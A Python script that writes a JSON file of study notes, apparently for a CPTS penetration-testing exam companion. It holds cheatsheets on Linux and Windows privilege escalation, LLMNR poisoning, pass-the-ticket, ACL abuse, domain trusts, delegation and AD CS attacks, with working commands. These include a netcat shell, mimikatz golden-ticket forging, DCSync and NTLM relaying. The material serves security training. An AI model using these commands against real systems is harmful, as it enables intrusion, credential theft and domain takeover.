import json
import os

modules = [
    {
        "slug": "linux-privesc",
        "cheatsheet_md": "## Linux Privilege Escalation Cheatsheet\n\n### System Enumeration\n*   `uname -a` - Kernel info.\n*   `lsb_release -a` - OS release info.\n*   `env` - Environment variables.\n\n### User & Group Enumeration\n*   `id` - Current user/groups.\n*   `cat /etc/passwd` - List all users.\n*   `sudo -l` - Check sudo permissions.\n\n### Network & Processes\n*   `netstat -ano` / `ss -tulpn` - Active network connections.\n*   `ps aux` - List running processes.\n*   `cat /etc/crontab` / `ls -la /etc/cron.*` - Scheduled tasks.\n\n### Common Pathways\n*   **SUID/SGID Executables**: `find / -perm -u=s -type f 2>/dev/null`\n*   **Writable Files**: `find / -writable -type d 2>/dev/null`\n*   **Capabilities**: `getcap -r / 2>/dev/null`\n*   **Kernel Exploits**: Look for unpatched kernel versions using an exploit DB search.\n*   **Path Abuse**: Checking if `.` or a writeable path is in `$PATH`.",
        "pitfalls_md": "*   **Running blind exploits**: Firing off kernel exploits without confirming the exact kernel version can crash the system.\n*   **Ignoring hidden files/files owned by a group you are in**: Often, backup files (.bak) or hidden config files contain credentials.\n*   **Overlooking cron syntax**: A misconfigured cron job might be running as root but the script it calls might be writable by your user.",
        "exam_tips_md": "*   Always start simple. Check `sudo -l` before trying a complex kernel exploit.\n*   If you find an odd SUID binary, check GTFOBins (`https://gtfobins.github.io/`) immediately.\n*   Enumerate automated scripts and processes, paying attention to what files they interact with."
    },
    {
        "slug": "windows-privesc",
        "cheatsheet_md": "## Windows Privilege Escalation Cheatsheet\n\n### System Enumeration\n*   `systeminfo` - OS details & hotfixes.\n*   `whoami /all` - User name, SIDs, privileges.\n\n### Privileges to Look For\n*   `SeImpersonatePrivilege` / `SeAssignPrimaryTokenPrivilege`: Use tools like JuicyPotato, PrintSpoofer, or RoguePotato.\n*   `SeBackupPrivilege`: Can copy SAM and SYSTEM hives to extract hashes.\n\n### Service Enumeration\n*   `sc qc [service_name]` - Query service configuration.\n*   `Get-CimInstance Win32_Service` - PowerShell service enum.\n*   **Unquoted Service Paths**: Look for paths without quotes containing spaces in `wmic service get name,displayname,pathname,startmode`.\n*   **Weak Service Permissions**: `accesschk.exe /accepteula -uwcqv [user] [service]`.\n\n### Scheduled Tasks\n*   `schtasks /query /fo LIST /v` - View full task details.\n*   Check for jobs where the executable is writable by the current user.\n\n### Registry & AutoRuns\n*   `reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run` - Startup programs.\n*   Check AlwaysInstallElevated registry keys.",
        "pitfalls_md": "*   **Crashing services**: Modifying services without knowing dependencies can freeze the machine.\n*   **Overlooking `whoami /priv`**: Many students jump to script-running without realizing they have a direct path via privileges.\n*   **Missed AppLocker rules**: Trying to run standard executables in restricted directories.",
        "exam_tips_md": "*   Run PowerUp or winPEAS early, but read the output carefully rather than blindly following its 'red' text.\n*   If you find `SeImpersonatePrivilege`, PrintSpoofer or GodPotato are your best friends.\n*   Always check `C:\\Users\\[User]\\AppData` for leftover configurations containing credentials."
    },
    {
        "slug": "getting-started",
        "cheatsheet_md": "## Getting Started Cheatsheet\n\n### Essential Tools\n*   **Netcat**: `nc -lvnp 4444` (listener), `nc [IP] 4444 -e /bin/bash` (bind or reverse).\n*   **Curl**: `curl -v http://target` (HTTP interaction/downloading).\n*   **Tmux**: `tmux new -s session_name`, `Ctrl+b d` to detach, `tmux attach -t session_name`.\n\n### Basic Linux Commands\n*   `chmod +x script.sh` - Make executable.\n*   `grep -ri \"password\" /var/www/html` - Search recursively.\n*   `find / -name \"flag.txt\"` - Locate files by name.\n\n### Basic Windows Commands\n*   `ipconfig /all` - Network config.\n*   `net user` - List local users.\n*   `type file.txt` - Read file contents.",
        "pitfalls_md": "*   **Losing shells**: Forgetting to stabilize a reverse shell (using `python3 -c 'import pty;pty.spawn(\"/bin/bash\")'`) can lead to accidental shell closure.\n*   **Tool reliance**: Running a tool without understanding its syntax and expecting magic to happen.\n*   **Not checking connectivity**: Troubleshooting an exploit when there's a firewall blocking your ping or reverse shell.",
        "exam_tips_md": "*   Take time to configure your environment (Tmux/Terminator) before starting the exam.\n*   Familiarize yourself with stabilizing a shell within seconds of catching it.\n*   Double-check your IP addresses: OpenVPN IP vs local interface IP."
    },
    {
        "slug": "nessus",
        "cheatsheet_md": "## Vulnerability Scanning with Nessus\n\n### Configuration & Setup\n*   **Installation**: Typically runs on port `8834` (https://localhost:8834).\n*   **Policies**: Create customized scan templates (e.g., specific port ranges, specific auth methods) instead of always running Basic Network Scan.\n\n### Scan Types\n*   **Host Discovery**: Ping sweeps to map the network.\n*   **Basic Network Scan**: Standard overarching vulnerability scan.\n*   **Credentialed Scan**: Provides deeper insights (e.g., missing patches, local misconfigs) by logging via SSH/WMI.\n*   **Compliance Scan**: Checks against CIS benchmarks or similar frameworks.\n\n### Reviewing Results\n*   Group by vulnerability to see how widespread an issue is.\n*   Check the \"Plugin Output\" for proof of execution or specifics on why Nessus flagged it.",
        "pitfalls_md": "*   **Scanning without credentials**: You'll miss 80% of local vulnerabilities and missing patches.\n*   **Reckless scanning**: Using overly aggressive scan settings (like unsafe checks) can drop a delicate production service.\n*   **Blindly trusting severity ratings**: Nessus might mark a potential web shell as 'Medium', but in a pentest, it's a critical entry point.",
        "exam_tips_md": "*   In practical situations, export Nessus results (HTML/CSV) to easily parse or include in reporting structures.\n*   If a host seems empty, verify your scan isn't being dropped by a local host firewall or incorrect routing."
    },
    {
        "slug": "openvas",
        "cheatsheet_md": "## Vulnerability Scanning with OpenVAS\n\n### Setup & Operations\n*   Started via Greenbone Security Assistant (GSA) web UI.\n*   Architecture involves `gvmd` (manager), `openvas-scanner`, and `gsad` (web UI).\n*   **Feed Updates**: `greenbone-feed-sync` (must be updated regularly for the latest NVT definitions).\n\n### Core Concepts\n*   **Targets**: IP addresses, CIDR blocks.\n*   **Tasks**: A combination of a target and a scan config (e.g., Full and Fast).\n*   **Reports**: Output generated after a task completes. Can be exported to PDF XML.\n\n### Usage Details\n*   Ensure the feed state is 'Current' before scanning.\n*   For authenticated scans, set up Credentials in GSA and attach them to the Target.",
        "pitfalls_md": "*   **Stale feeds**: Scanning with old Network Vulnerability Tests (NVTs) means missing critical modern vulnerabilities.\n*   **Resource starvation**: OpenVAS is resource-intensive. Running highly concurrent scans can crash the scanner VM.\n*   **Overlooking overrides**: Forgetting to configure 'Overrides' for false positives can skew final reports.",
        "exam_tips_md": "*   While CPTS heavily focuses on manual exploitation, understanding the output of an OpenVAS XML is crucial for automation components.\n*   If GSA is unresponsive, check the disk space; OpenVAS logs and databases grow massively."
    },
    {
        "slug": "documentation-reporting",
        "cheatsheet_md": "## Documentation & Reporting Cheatsheet\n\n### Key Components of a Report\n1.  **Executive Summary**: High-level overview, business risk, and strategic recommendations (written for C-level).\n2.  **Scope & Methodology**: What was tested, how, and limitations.\n3.  **Narrative / Attack Chain**: How the complete compromise occurred, chaining vulnerabilities.\n4.  **Technical Findings**: Detailed write-ups for each vulnerability.\n    *   Title, Severity, CVSS score.\n    *   Description of the flaw.\n    *   Impact.\n    *   Proof of Concept (PoC) / Steps to Reproduce.\n    *   Remediation.\n\n### Tools & Best Practices\n*   **Note-taking**: Obsidian, Notion, or CherryTree.\n*   **Screenshots**: Flameshot or Greenshot.\n*   *Rule of Thumb*: Include enough detail in the PoC that a non-security IT admin could replicate the attack.",
        "pitfalls_md": "*   **Poor PoC steps**: Stating \"Exploited MS17-010 to get shell\" without showing the command run or the output received.\n*   **Jargon in Executive Summary**: Confusing stakeholders with overly technical explanations.\n*   **Missing remediation**: Pointing out a flaw but providing zero actionable advice to fix it.",
        "exam_tips_md": "*   The CPTS exam requires a thorough, professional report. It is as important as the hack itself.\n*   Document as you go. Do not wait until day 7 to start writing your notes.\n*   Always format code blocks and command outputs cleanly."
    },
    {
        "slug": "attacking-enterprise",
        "cheatsheet_md": "## Attacking Enterprise Networks\n\n### Enterprise Methodology\n1.  **External Recon**: OSINT, certificate parsing, ASN enum.\n2.  **Perimeter Breach**: Phishing, VPN bruteforce, attacking external web apps (e.g., OWA, Citrix).\n3.  **Internal Footprinting**: Active Directory enumeration via BloodHound, PowerView.\n4.  **Local Privilege Escalation**: Escalate from a standard user to local SYSTEM on a single endpoint.\n5.  **Lateral Movement**: Moving from desktop to desktop or desktop to server (Pass the Hash, WMI, WinRM).\n6.  **Domain Escalation**: Path to Domain Admin (Kerberoasting, AS-REP roasting, BloodHound paths).\n\n### Tool Chains\n*   `Responder` for catching hashes on local segments.\n*   `BloodHound` / `SharpHound` for mapping AD relationships.\n*   `CrackMapExec` / `NetExec` for credential spraying and execution.",
        "pitfalls_md": "*   **Tunnel vision**: Getting stuck on one unexploitable machine for days while ignoring 50 other machines on the subnet.\n*   **Noisy actions**: Running aggressive tools (like mass nmap scans or spray commands) without thinking about account lockouts and IDS alerts.\n*   **Losing C2 access**: Relying on a single unstable reverse shell instead of dropping persistence or alternative beacons.",
        "exam_tips_md": "*   Always keep your notes organized by host and network segment.\n*   Map out routing early. If you pivot, ensure your proxychains are set up correctly.\n*   Use `NetExec` (formerly CrackMapExec) heavily for situational awareness."
    },
    {
        "slug": "llmnr-poisoning",
        "cheatsheet_md": "## LLMNR/NBT-NS Poisoning Cheatsheet\n\n### Concepts\n*   **LLMNR** (Link-Local Multicast Name Resolution) and **NBT-NS** (NetBIOS Name Service) are fallback mechanisms when DNS resolution fails in Windows networks.\n*   An attacker can listen for these broadcasts and spoof the response, requesting authentication from the victim.\n\n### Responder Usage\n*   **Start Responder**: `sudo responder -I <interface> -dw`\n*   *Flags*: `-I` (Interface), `-d` (Enable DHCP responses), `-w` (Enable WPAD rogue proxy).\n*   **Captured Hashes**: Stored in `/usr/share/responder/logs/` or `Responder/logs/`.\n\n### Cracking NTLMv2\n*   Hashes intercepted are NetNTLMv1 or NetNTLMv2.\n*   `hashcat -m 5600 hashes.txt wordlist.txt` (NetNTLMv2).\n\n### Mitigation\n*   Disable LLMNR via Group Policy (Computer Configuration -> Administrative Templates -> Network -> DNS Client).\n*   Disable NBT-NS on network adapter settings.",
        "pitfalls_md": "*   **Using Responder continuously on production**: Responder can break network connectivity/DNS if it aggressively poisons legitimate requests.\n*   **Trying to Pass-the-Hash with NetNTLMv2**: You CANNOT Pass-the-Hash with a NetNTLM challenge/response hash; it must be cracked or relayed.\n*   **Poisoning self**: Sometimes you poison your own VMs or team infra on a shared network layer.",
        "exam_tips_md": "*   Fire up Responder early when you land on an internal network segment, it's low hanging fruit.\n*   If cracking fails, immediately transition to NTLM Relaying (ntlmrelayx) against machines with SMB signing disabled."
    },
    {
        "slug": "ptt-pth",
        "cheatsheet_md": "## Pass the Ticket & Pass the Certificate\n\n### Pass the Ticket (PtT)\n*   Use compromised Kerberos tickets (TGT or TGS) to authenticate as a user without their password or hash.\n*   **Linux (Impacket)**:\n    *   Set `export KRB5CCNAME=/path/to/ticket.ccache`.\n    *   Use tools: `psexec.py -k -no-pass host.domain.local`.\n*   **Windows (Rubeus/Mimikatz)**:\n    *   `Rubeus.exe ptt /ticket:base64_or_file.kirbi`\n    *   `mimikatz # kerberos::ptt ticket.kirbi`\n\n### Pass the Certificate\n*   Extracting a machine or user certificate containing a private key (.pfx) to authenticate as them to ADCS/LDAP.\n*   **Certipy (Linux)**: `certipy auth -pfx user.pfx -dc-ip <IP>` -> Retrieve NT hash or TGT.\n*   **Rubeus (Windows)**: `Rubeus.exe asktgt /user:User /certificate:cert_blob /password:cert_pass /ptt`",
        "pitfalls_md": "*   **Timestamp desynchronization**: Kerberos explicitly requires clock synchronization (< 5 mins). If your attacker box clock is off, PtT will fail!\n*   **Using IP instead of FQDN**: Kerberos tickets require the hostname/SPN. Doing `psexec.py -k 10.10.10.10` fails. Use FQDN (e.g., `dc01.corp.local`).\n*   **Linux ccache vs Windows kirbi**: Make sure to convert formats if copying a ticket from Windows to attack box (using ticket_converter.py).",
        "exam_tips_md": "*   Adding the target to `/etc/hosts` to match the exact Active Directory FQDN is absolutely critical for Kerberos attacks.\n*   If you find `.pfx` or `.pem` with a private key, try authenticating to LDAPS."
    },
    {
        "slug": "acl-abuse",
        "cheatsheet_md": "## ACL Abuse Cheatsheet\n\n### Key Concepts\n*   Access Control Lists (ACLs) define who can do what to AD objects.\n*   **ACEs** (Access Control Entries) grant specific rights like `GenericAll`, `WriteDacl`, `ForceChangePassword`, etc.\n\n### Enumeration\n*   **BloodHound**: Best way to visualize ACL attack paths (e.g., User A has ForceChangePassword over User B).\n*   **PowerView**: `Get-ObjectAcl -SamAccountName \"TargetUser\" -ResolveGUIDs`.\n\n### Common Exploits\n*   **ForceChangePassword**: Changes a user's password without knowing old one. `Set-DomainUserPassword -Identity TargetUser -AccountPassword (ConvertTo-SecureString \"Password123!\" -AsPlainText -Force)`\n*   **GenericAll / GenericWrite**: Add yourself to a group, or change properties. `Add-DomainGroupMember -Identity TargetGroup -Members AttackerUser`.\n*   **WriteDacl**: Add an ACE granting yourself GenericAll. `Add-DomainObjectAcl -TargetIdentity Target -PrincipalIdentity Attacker -Rights All`.\n*   **DCSync (GetChangesAll)**: Replicate directory changes. Extracts hashes using `secretsdump.py`.",
        "pitfalls_md": "*   **Changing passwords blindly**: Doing `ForceChangePassword` on an active admin might cause lockouts and gets noticed quickly. Ensure it's absolutely necessary or a service account you can revert.\n*   **Misreading BloodHound**: Ensure that the arrow direction means 'YOU have rights OVER Target', not the reverse.\n*   **Replication delays**: Changing an ACL on one Domain Controller might take minutes to replicate to the DC you use for authentication.",
        "exam_tips_md": "*   Use `bloodyAD` or `PowerView` mapped to BloodHound to execute your ACL abuse.\n*   When dumping hashes via DCSync, only dump specific target users if possible to save time and reduce network noise."
    },
    {
        "slug": "domain-trusts",
        "cheatsheet_md": "## Domain Trust Attacks Cheatsheet\n\n### Key Concepts\n*   **Trusts** link domains or forests, allowing users in Domain A to access resources in Domain B.\n*   **Transitive vs Nontransitive**: If A trusts B, and B trusts C, A trusts C (Transitive).\n*   **Intra-forest vs Inter-forest**: Trusts within the same AD forest vs trusts to entirely different external forests.\n\n### Enumeration\n*   **PowerView**: `Get-DomainTrust` or `Get-ForestTrust`.\n*   **NetExec**: `nxc smb <DC-IP> -u user -p pass --trusts`.\n\n### Escalation & Exploitation\n*   **Child to Parent (Intra-forest)**: Compromise child domain -> dump KRBTGT -> Forge an Golden Ticket with `SID History` containing the Enterprise Admins SID. \n    *   `mimikatz # kerberos::golden /user:Administrator /domain:child.local /sid:<child_sid> /sids:<parent_sid>-519 /krbtgt:<krbtgt_hash> /ptt`\n*   **Across Forests**: Usually relies on hunting mapped users/groups or exploiting misconfigured Foreign Security Principals.",
        "pitfalls_md": "*   **Using the wrong SID**: SID history attacks fail if you append the wrong 519/512 relative identifier or supply the incorrect krbtgt.\n*   **Assuming trust = admin**: An Inter-forest trust does NOT mean Enterprise Admin. It just means you can authenticate. You still need an authorization path.\n*   **Name resolution issues**: Querying foreign domains requires DNS routing. Make sure your DNS server is pointing to the DC handling the trust.",
        "exam_tips_md": "*   In exam scenarios with multiple domains, immediately map trusts and check for `Enterprise Admins` groups.\n*   `SID History` Golden Tickets are your reliable key from Child to Forest Root."
    },
    {
        "slug": "delegation-attacks",
        "cheatsheet_md": "## Delegation Attacks Cheatsheet\n\n### Types of Delegation\n1.  **Unconstrained Delegation (UD)**: Server caches TGTs of users who connect to it. If you compromise the server, you steal TGTs (e.g., Domain Admin connects, you dump TGT).\n2.  **Constrained Delegation (CD)**: Server is allowed to impersonate users, but ONLY to specific other services.\n3.  **Resource-Based Constrained Delegation (RBCD)**: The target service controls who can impersonate it, configured via the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute.\n\n### Exploitation Tools\n*   **Rubeus**: Used heavily for `s4u` attacks (S4U2Self / S4U2Proxy) which simulate the delegation process.\n*   *Rubeus S4U Syntax*: `Rubeus.exe s4u /user:ServiceAcc /rc4:Hash /impersonateuser:Administrator /msdsspn:cifs/target.local /ptt`\n*   **Impacket**: `getST.py` mimics Rubeus for Linux-based s4u attacks.\n\n### Checking Delegation\n*   `Get-DomainUser -TrustedToAuth` (Constrained)\n*   `Get-DomainComputer -Unconstrained` (Unconstrained)",
        "pitfalls_md": "*   **Service account vs Computer account**: Make sure you use the correct RC4/AES hash. If a user runs the service, use the user's hash; if NETWORK SERVICE, use the machine account hash ending in `$`.\n*   **Failing to fetch TGS**: S4U attacks are complex. Provide the correct domain formatting, RC4 hash, and `msdsspn` string exactly as listed in AD.\n*   **Protocol Transition**: Some constrained delegations require `TrustedToAuthForDelegation` to be true.",
        "exam_tips_md": "*   Delegation is highly likely to feature in advanced labs. Master `getST.py` and `Rubeus.exe s4u`.\n*   Look out for generic write permissions on computer objects; it's a direct path to RBCD."
    },
    {
        "slug": "adcs-attacks",
        "cheatsheet_md": "## AD CS Attacks Cheatsheet\n\n### Active Directory Certificate Services (AD CS)\n*   AD CS acts as a Public Key Infrastructure (PKI). Misconfigurations can lead to Domain escalation.\n\n### Enumeration (Certipy / Certify)\n*   **Certipy**: `certipy find -u user -p pass -dc-ip <dc-ip> -vulnerable -stdout`\n*   Look for Vulnerable Templates (ESC1, ESC2, ESC3, ESC4, ESC8).\n\n### Common Vulnerabilities\n*   **ESC1**: Template allows ENROLLEE SUPPLIES SUBJECT -> You specify the SAN (Subject Alternative Name) as a Domain Admin.\n    *   `certipy req -u user -p pass -ca CA-NAME -template VulnerableTemp -upn administrator@domain.local`\n*   **ESC4**: Template ACL gives you write permissions to the template -> Modify it to become ESC1.\n*   **ESC8**: NTLM Relay to AD CS HTTP Web Enrollment.\n    *   Trigger authentication (e.g., PetitPotam) -> `ntlmrelayx.py -t http://ca.domain/certsrv/certfnsh.asp -smb2support --adcs`.\n\n### Artifact Usage\n*   Convert `.pfx` or use certipy to obtain TGT/NTLM hash of the target.",
        "pitfalls_md": "*   **Wrong CA string**: When requesting a cert, the `-ca` string must perfectly match the CA name (not the hostname), enumerated via `certipy find`.\n*   **Certificate Expiration/Revocation**: Ensure the CA is actually issuing certificates and you aren't fighting AD policies.\n*   **Relaying to HTTPS**: ESC8 ntlm relay generally fails if the Web Enrollment has HTTPS/EPA (Extended Protection for Auth) strictly enforced.",
        "exam_tips_md": "*   `Certipy` is your primary weapon. Master `find`, `req`, and `auth` commands.\n*   Always check if a template requires manager approval. If it does, ENROLLEE SUPPLIES SUBJECT won't yield an immediate cert."
    }
]

import os
os.makedirs(r"c:\Users\Syed Amer\Documents\Phet\cpts companion\seed\patch-base-25-37", exist_ok=True)

with open(r"c:\Users\Syed Amer\Documents\Phet\cpts companion\seed\patch-base-25-37\modules-rich.json", "w", encoding="utf-8") as f:
    json.dump(modules, f, indent=2)

print(f"Wrote modules-rich.json with {len(modules)} entries.")
